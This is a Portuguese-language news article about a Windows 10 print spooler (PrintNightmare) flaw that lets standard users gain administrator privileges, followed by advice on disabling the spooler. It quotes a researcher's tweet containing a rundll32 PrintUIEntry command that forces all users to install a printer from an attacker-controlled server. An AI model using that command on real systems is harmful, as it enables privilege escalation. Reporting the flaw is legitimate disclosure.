Windows 10: nova falha no sistema de impressão é descoberta

Nesta semana, a Microsoft liberou uma atualização para corrigir uma falha grave envolvendo o sistema de impressão do Windows 10. Agora, poucos dias após o update ter sido liberado, uma nova falha neste sistema foi revelada.

A descoberta foi feita por Benjamin Delpy, um dos criadores do exploit conhecido como “Mimikatz”. Em seu perfil do Twitter, ele demonstra que, agora, usuários comuns do Windows ainda conseguem ganhar privilégios administrativos quando o driver de uma impressora local já se encontra instalado.

But my favorite (for now) #printnightmare dirty trick is: *as a standard user* the way to *force* all other users/admins of workstation/server to install printers?

rundll32 printui,PrintUIEntry /ga /n"\print.lab.localKiwi Legit Printer"

Rpc(Asyn)cAddPerMachineConnection pic.twitter.com/kTC2DBdPKp

— ? Benjamin Delpy (@gentilkiwi) August 13, 2021

Com a atualização liberada nesta semana, vale lembrar, a Microsoft passou a requisitar privilégios de administrador para instalar novos drivers de impressoras locais. Entretanto, com a nova falha, se o driver já estiver instalado em um PC, apenas o fato de se conectar a impressora local já pode garantir aos usuários comuns os privilégios de administrador.

Falha descoberta no Windows 10 não é exatamente nova

Apesar da Microsoft ter reconhecido esta falha apenas agora, um outro desenvolvedor, Victor Mata, já havia alertado a empresa sobre o problema em dezembro. Inclusive, a própria Microsoft reconhece a sua contribuição na página em que explica os detalhes desta vulnerabilidade.

Já como aponta o site Bleeping Computer, na Coréia do Sul e em alguns outros países da Ásia, grupos estão se aproveitando desta vulnerabilidade para realizar ataques ransomware.

Como se prevenir da falha no sistema de impressão

Enquanto a Microsoft não divulga uma nova correção para o problema encontrado no Windows, os usuários podem apenas desabilitar o seu serviço de impressão a fim de ficarem protegidos.

Para isso, basta apertar junto as teclas “Win + R”, escrever “services.msc” (sem aspas) e dar “Enter” para abrir a ferramenta de “Serviços do sistema”. A partir daí é só procurar o serviço “Spooler de Impressão” ou “Print Spooler”, clicar com o botão direito do mouse e escolher “Parar”. Quem estiver na versão Professional do Windows 10 também pode limitar os serviços de impressão a partir das configurações da Política de Grupo.

Já para habilitar a função novamente, é só repetir os mesmo passos e selecionar a opção “Iniciar”. Vale notar que, ao desativar o serviço, seu computador fica impossibilitado de imprimir documentos – mas ao menos estará protegido contra ataques do tipo.